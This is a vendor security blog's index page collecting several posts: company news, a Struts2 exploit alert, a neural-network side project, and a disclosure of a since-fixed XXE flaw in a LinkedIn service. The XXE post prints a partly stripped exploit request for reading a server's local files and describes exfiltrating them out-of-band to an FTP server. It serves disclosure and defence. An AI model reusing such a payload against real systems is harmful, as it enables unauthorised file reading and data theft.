Wallarm Blog

Hey! We moved our blog to wonderful Medium platform.

New link to this post: https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2

Two days ago Apache has published a fix for the new Remote Code Execution vulnerability in Struts2 https://cwiki.apache.org/confluence/display/WW/S2-045

This vulnerability allows attacker to execute arbitrary Java code on the application server.

We can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.

New link to this post: https://lab.wallarm.com/cioreview-names-wallarm-in-20-most-promising-enterprise-webapp-solution-providers-ef8ce86758d7#.4gluu5nqn

We are glad to be short-listed amongst Top-20 most promising solution providers for the web apps by CIOReview. This is a good illustration of how we are helping enterprises to secure their web apps.

The award mainly emphasizes on our innovativeness in helping enterprises gain popularity through high-performance web applications.

Wallarm has been recognized as one among the elite group of companies that are featured in the Enterprise Web Application special edition of CIOReview magazine.

“Wallarm is shortlisted to the list of 20 Most Promising Enterprise Web Application Solution Providers 2017 by CIOReview magazine based on its expertise in providing innovative Web Applications and the ability to delight customers and facilitating return on investments through strategic relationships, services and programs,” said Jeevan George, Managing Editor of CIOReview.

Web attacks and vulnerabilities are the common issues faced by the enterprises in their network infrastructure. Wallarm comes up with a next-generation web application firewall and vulnerability scanner integrated in one unique product suite, which provides continuous security for agile teams. Wallarm is the complete solution for blocking attacks and detecting vulnerabilities for the modern web applications and APIs.

About CIOReview

New link to this post: https://lab.wallarm.com/rsa-2017-takeaways-576e4e2fc97#.3abd1lgks

Last week Wallarm attended RSA Conference in San Francisco. Wallarm booth was quite popular all three days of the show. We’ve got to network with over 300 of our current and future customers. We have presented both our next generation WAF product and our upcoming product for CI/CD application testing, Wallarm FAST.

Wallarm has detected hundreds of vulnerabilities just for the companies who signed up for a free trial of the Wallarm vulnerability scanner during the show.

The show was huge. Walking around both parts of the exhibit center (the show was in both North and South concourse of Moscone center) took several hours. We have seen a lot of friendly faces from the companies like #NGINX.

Interestingly, a whole day of the show was devoted to increasing security of DevOps with a specialized event called DevOps connect.

Even though we spent most of our time on the exhibit floor, catching up on the show presentations also provided some interesting insights:

Ransome-ware + IOT = some very scary situation. As exemplified by a recent case at San Francisco Trade Authority.

New link to this post: https://lab.wallarm.com/rick-orloff-joins-wallarm-advisory-board-d4cc8b3471a2#.n3a2u4z6i

We’re happy to announce Rick Orloff joining Wallarm advisory board. Rick will work closely with a team advising on product and roadmap.

Rick has successful 20-years long track record in security and is currently the Chief Security Officer at Code42. Prior to that he was a Vice President and Chief Information Security Officer at eBay and before that spent seven years at Apple Inc. He is a member of several Advisory Boards such as Raytheon Cyber Products, Oracle, Box Inc, FINDO, 802 Secure, and now Wallarm.

As is a tradition for the new members of the advisory board, we asked Rick a few questions about his vision of application security.

Application security has always been hard. How did it become even more complicated in the last few years?

Application security is always difficult and got further complicated as the software developers often developed their code while focusing on product features. Development teams were measured on delivering the feature sets to scope, schedule, and budget. The problem was, security was not one of the core design principles which meant security was addressed as a checkbox approach and not part of the primary workflow. Quite often, the security issues discovered were complicated to correct and placed the DevOps schedule at risk and this introduced friction between the security teams and the DevOps teams. From a customer persecutive, this often meant code was released with known issues and the developers were now racing to develop a 1.x.1 security patch.

Could you give your 3-5 take-aways for those enterprises adopting agile/CI/CD to run faster but not willing to sacrifice security?

Teams that follow agile practice with security experts embedded in their development processes developed code faster and more securely than teams that didn’t. In fact, as some of these teams embraced this model, they began including security elements as features. From a product management perspective, adopting an Agile approach means that when DevOps are walking into a Change Control Board meeting, security is already fully baked in and they don’t have to compromise customer security over their product delivery schedule.

What do you like best about Wallarm products/approaches?

New link to this post: https://lab.wallarm.com/meet-wallarm-at-rsa-2017-introducing-wallarm-fast-42df675bd91a#.in1wyiop2

Next week, come visit with Wallarm in San Francisco. We will be exhibiting at the RSA conference, at the north part of Moscone Center, booth #N4825.

Those of you who make it to the show will get a sneak peek of the new product we are working on - Wallarm FAST.

Wallarm FAST will help those working in CI/CD environment:

increase test coverage

deploy test automation as a service

focus DevSecOps on business logic

Wallarm FAST is designed to be a flexible test environment and provide Test Automation As A Service. Tests are run from the Wallarm Cloud service allowing DevOps full configuration control without having to worry about environment deployment, scale or flexibility.

Custom policies can be configured for composition, running and reporting on Test Jobs. Wallarm FAST generates tests using both known attack vectors such as OWASP top10 and fuzzing as well as payload patterns seen in production traffic.

Run policy configuration includes schedule of the test runs, scan load, source and frequency of the scans.

We support the following protocols (including nested protocol) for Deep Request Inspection:

HTTP/2.0

REST

JSON

COMET

XML

SOAP

Base64

GZIP

VIEWSTATE

PHP (unserialize)

Using Wallarm FAST, DevOps and DevSecOps teams can increase security test coverage 100X or more. Moreover, test results for every build are summarized and shown in a single-pane-of-glass dashboard. DevOps managers will now have all the test information at their fingertips.

Can’t get to San Francisco in time but would like to try Wallarm FAST for yourself? Get in touch with us for demo at [email protected]

New link to this post: https://lab.wallarm.com/ai-drugs-fridayproject-5055d2391aa5#.8ywci049s

This is a small Friday project aimed at bringing some fun to those who deal with Neural Networks and got a bit tired of them. The idea is to emulate the impact of alcohol and other substances on a Neural Network. The project outcomes can be interesting. It can also help you measure the stability of your networks which can be quite useful.

We create many networks and often times we need to understand how excessive is the information stored inside. How many neurons are not really significantly involved in the output layer? How excessive is our topology for a particular problem? We created NeuralDrugs to answer all these questions.

A simple code is available on GitHub and is compatible with the TensorFlow models. Enjoy!

# git clone [email protected]:wallarm/neuraldrugs.git

During the first run, you need to enter the path to the model’s meta-file as well as the operation mode. A model’s file will be changed, in some bizarre fashion part of the weights will change their values. This will lead to unusual outcomes during computations.

The model where alcohol is interacting with neurons assumes that the blood clots clog the oxygen access to a neuron and it dies off. This can be emulated by putting the minimum possible weight on the neuron (https://en.wikipedia.org/wiki/Short-term_effects_of_alcohol_consumption). The impact of DMA on the neurons is represented by an arbitrary weight on the neuron. Unlike “Alcohol”, such an impact could cause the network to “hallucinate”, i.e. produce unpredictable results.

Let’s check the model’s performance using im2txt, Google’s image detection network. (https://github.com/tensorflow/models/tree/master/im2txt) In our case, it has been taught around 2 million iterations.

Here is the image output of the clean network:

Captions for image wallarm.jpg:

a couple of men standing next to each other . (p=0.001899)

a man and a woman standing next to each other . (p=0.000383)

a couple of men standing next to each other in front of a sign . (p=0.000084)

Now let’s run our Friday project and see what happens. The first parameter is a path to the network’s model, the second is the percentage of the network’s neurons. These values will be assigned randomly.

# ./neuraldrugs.py ./model/train/model.ckpt-1446068 --set_weights_random --dosage 0.05

The results are quite amusing:

Captions for image wallarm.jpg:

a man and woman standing next to angle ornaments . (p=0.001681)

a man and woman standing next to each other . (p=0.000604)

a man and woman standing next to angle ornaments (p=0.000185)

The network’s vision has been diluted and now it sees ornaments where previously it could only see the people and the road sign.

Now let’s increase the dose and check out the result once more:

# ./neuraldrugs.py ./model/train/model.ckpt-1446068 --set_weights_random --dosage 0.07

Captions for image wallarm.jpg:

a a a a man warms a a a a angle dumping warms medal medal . (p=0.001371)

a a a a a man and a a fried a a fried dumping (p=0.000317)

a a a a man warms a a a a angle dumping warms medal (p=0.000254)

Now the network is talking about some dumping which is quite amusing. It also stutters on the article which makes sense for a recurrent neural network.

Now let’s take WaveNet for our next example. WaveNet is a generative neural network architecture for image generation. (https://github.com/Zeta36/tensorflow-image-wavenet) As a learning range, let’s feed the network these photos of an object from different angles:

The machine learning outcome for a clean network looks like some average case of this object. It can be guessed easily by its outline. It is black and white because the image has been restored from the network through the weight of the color contrast neurons. The resolution is only 64x64 because of the convolution but you can see it easily:

This network consists of 16384 neurons (18 layers with a different number of neurons). Our parameter 0.01 means that 0.01% of the total neuron number will be damaged i.e. only one neuron after rounding. Take a look at the result of the random value weight change with only one random neuron out of 16384 in the network:

Now let’s run our program and see the result:

# ./neuraldrugs.py ./logdir/train/2017-01-24T06-34-00/model.ckpt-58352 --set_weights_random --dosage 0.01

This network consists of 16384 neurons (18 layers with a different number of neurons). Our parameter 0.01 means that 0.01% of the total neuron number will be damaged i.e. only one neuron after rounding. Take a look at the result of the random value weight change with only one random neuron out of 16384 in the network:

Despite the simplicity of the project, it is really helpful in testing the finished networks. As a criterion, you can use a number of weights that can be damaged in the network without losing the accuracy.

New link to this post: https://lab.wallarm.com/gene-golovinsky-joins-wallarms-advisory-board-a1fcea8b636#.j6lmbyga0

We’re thrilled to announce Gene Golovinsky joins our advisory board. Being Director of Security Research and Development at Intuit, he has an incredible background ranging from large ISV to startups.

With over 20 years experience in technology Gene led product and development teams across multiple geographies. He served as the VP R&D at Limelight Networks, Chief Architect and Director of Qualys, VP R&D for AlertLogic, Sr Director at BMC Software. Gene has MS degree in Computer Engineering.

Gene will help to shape Wallarm products to the Fortune500 companies needs. Here are some thoughts of why legacy products fail to protect modern web apps.

From you point of you, why application security problem is not solved yet (with zillions security product on the market)?

Application security is rapidly evolving space. New technology stacks are showing up all the time. Most of the AppSec tools and methods are relying on static approaches. From anti-virus to WAFs we rely on things we already know or seen before. When some new problem or exploit show up, even the very fast reacting solution needs time to do just that – react. Very few, if any, are actually looking at the business logic and the workflow to understand if this is an attack or if the attack is real. Wallarm has the potential of adopting near real time. This makes it both technologically intriguing and valuable from the business perspective

What do you like in Wallarm product and team?

Really like that the product is the evolution of the set of tools coming out of the practical experience of security professionals that were used to help secure real business environments. That helped the team to come up with the flexible and extensible architecture. The founding team has shown eagerness to learn, be flexible and make products better. They truly listen to their customers and take feedback. I am very honored to be joining the team and hope to be a part of the exciting journey that is ahead of Wallarm.

New link to this post: https://lab.wallarm.com/wallarm-is-the-top-25-fastest-growing-y-combinator-summer-2016-startups-8096ab99584e#.ygxzc1s3r

Wow! Wallarm is one of the top 25 fastest growing Y Combinator (S16 batch) companies, according to the Mattermark research.

Mattermark ranked this batch of Y Combinator and found companies with the highest Mattermark Growth Score. Mattermark's Growth Score measures how quickly a company is gaining traction at a given point in time.

Mattermark was launched in 2012 as a data platform for VCs with hopes of becoming the go-to software for firms to use when quantifying signals of growing and potentially lucrative startups.

New link to this post: https://lab.wallarm.com/critical-linkedin-vulnerability-proactively-resolved-by-wallarm-xxe-in-application-server-239bba28e415#.lgprax5d5

With all the time and resources we allocate to finding application vulnerabilities it’s easy to forget that 3rd party libraries and software can introduce vulnerabilities into our applications as well. Hackers know this and they try to exploit them. In this blog post we will illustrate a vulnerability found within one of the LinkedIn services. The security issue was discovered in December 2015 and was fixed within 24 hours by the LinkedIn team.

What is XXE

OWASP says, An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

So XXE vulnerability is not truly a developer mistake but more of a misconfiguration of the XME parser.

If you are not familiar with XME External Entities, we suggest referring to XML RFC. It is also well worth your time to read a special OWASP page.

The impact of XXE vulnerabilities are severe. They allow the ability to read local files on remote servers, run queries into internal networks, and in some cases even execute code remotely.

XXE in an application server

An even more complicated situation is where a vulnerability is not introduced in your code, but in the web server or application server you use.

A good example here is an old vulnerability in SOAP server Apache CXF. Unsafe initialization was introduced in Apache CXF library, and the developer was unable to catch how the XML parser initialized. As a quick bug fix, Apache CXF maintainers propose developers to redefine the XML parser in a safe way by themselves. In the case it was possible — but what if you have such a vulnerability in the code of web server?

This is exactly the case with the critical LinkedIn service vulnerability discovered by Wallarm security researcher, Anton Lopanitsyn.

Vulnerability in LinkedIn

LinkedIn Marketing Solutions is a B2B product for the marketing purposes within a social network. After a simple check, it turned out that web server parses all of the XML documents passed within HTTPS requests. Parsing happens even before passing a control flow to the web application itself. So it was the functionality of the application server.

As a result, it was possible to send XML documenst to any web server URL which could result in the XXE vulnerability being exploited. This is an example of a request to the root page which allowed the reading of the local file /etc/motd

POST / HTTP/1.1 Content-type: blabla/xml Host: signin.lms.linkedin.com Content-Length: 204 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Wallarm-bot Accept: */* %asd; %rrr; ]> 123

The content of xxe.dtd:

'>%c;

In the XML file, a special OOB technique was used for reading the file content and transmitting it to the FTP server. You can get more details on this technique in this article.

Wallarm reported this vulnerability to the LinkedIn Security Team on December 12th and received an initial response within two minutes. The vulnerability was fixed within a 24-hour turnaround.

Protection against XXE

Obviously, organizations are not able to do a lot if a vulnerability occurs in 3rd party libraries or application server.

In this case, you need to use WAFs (Web Application Firewall) which analyze all the HTTP request and block those which malicious payloads.

However, there is one complication….a WAF needs to have full support for parsing XML documents to provide an actual protection against XXE vulnerabilities. It may seem that an organization just requires a few regular expressions to analyze requests. However, XML documents could be transmitted in a different encoding, e.g. in UTF-16, andattempts to mitigate via expressions will fail

Wallarm parses all the XML content to detect XXE attacks. Furthermore, Wallarm can discover XXE vulnerabilities with a built-in fuzzer. You can try it now for free at https://wallarm.com.

New link to this post: https://lab.wallarm.com/ah-ha-we-like-this-much-1fd1b5f11b6d#.yz6e9abqn

Ah-ha, we like this much. sqlmap, which is an incredibly popular tool that automates the process of detecting and exploiting SQL injection flaws, is now able to identify applications and API protected by Wallarm.

When WAF is detected, sqlmap even proposes to activate tamper scripts and try to bypass security checks. But as Wallarm doesn’t use regular expressions for attack detection and more relies on statistical profiles, it won’t help, sorry :)

New link to this post: https://lab.wallarm.com/nginx-survey-overall-57-of-organizations-use-a-waf-b59e87803a5d#.og0mqzwco

NGINX is the heart of the modern web. NGINX team used their unique position in the marketplace to survey modern technology professionals about their thoughts and perceptions of both the current state and the future of application development and deployment.

According to the survey, the most popular technique for improving security and protecting against data breaches is to install a web application firewall (WAF). Overall, 57% of organizations use a WAF. Among smaller companies WAF usage was even higher, up to 69%. Infrastructure anti-DDoS (at Layers 2 and 3) is gaining popularity in small and medium organizations as well, whereas a higher percentage of large companies are using anti-virus.

Wallarm has been actively supporting CTFs for many years to help both teams and organizers to improve the CTF community. And this year is no exception. We are proud to sponsor Plaid CTF this year.

PlaidCTF is an annual computer security competition created by the Plaid Parliament of Pwning (PPP). This competition is played by hundreds of information security professionals and students every year from around the world online over a 48-hour period. Participants compete in a variety of challenges in order to showcase their computer security skills and compete for valuable cash prizes. In addition, PlaidCTF is one of just 10 competitions that can qualify teams to participate at the 2016 DEF CON CTF in Las Vegas.

We are thrilled to announce a new release of Wallarm Node™. It’s a brand-new version of the Wallarm filter instance (NGINX-based), with new features and a host of optimizations.

Significant refactoring has resulted in improved performance. Optimizations were made to provide sophisticated security checks with near-zero latency. This has been a critical request for our customers with massive-load applications.

The Wallarm Node 2.0™ release, introduces support for Websocket protocol. We believe Wallarm™ to be the very first web application firewall (WAF) with a full WebSocket support. We continue to address new threats for the modern web. Filter instance is now capable of detecting and blocking attack payloads within WebSockets protocol. Additional optimizations were done for popular WebSocket-based frameworks, such as: ASP.NET SignalR and Socket.io. To enable attack detection for WebSockets, you need to use wallarm_parse_websocket on directive in location section or apply it for the whole server in the NGINX configuration file.

Wallarm Node 2.0™ implements enhanced analysis of XML-based data to provide better protection for applications and APIs (SOAP, etc.). This change is especially valuable as we observe an increasing number of attacks targeting XXE vulnerabilities.

Wallarm Node 2.0™ is now even easier to configure. We eliminated a troublesome shm_size parameter which results in no longer needing to setup the size of the local blocking ruleset; everything is done automatically. We listen to our customers and we know how it bothered you before!

Grab a moment and catch Wallarm CEO Ivan Novikov at SyScan 360 which is about to start in hot Singapore. His talk on Key-value injections here! will be on the second day of the conference.

This paper is continuation of memcached injections research presented at BlackHat USA 2014.

The paper presents two main areas of research: input validation vulnerabilities at different key-value clients for popular platforms (c, java, lua, node.js, php, perl, python and ruby) and vulnerabilities inside their engines. Special attention is paid for to the sandboxes inside services.

This week (March 15-17) the first and foremost world-class technology conference in the hosting and cloud services industry, WHD.global, is taking place in Rust, Germany. The trade show, established 12 years ago, brings more than 6.000 leading experts and insiders together for high-value networking, informative discussions, and shared experiences. Exhibiting companies include Acronis (a Wallarm partner), Dell, HP, Lenovo, Odin, AMD, Samsung, and Microsoft.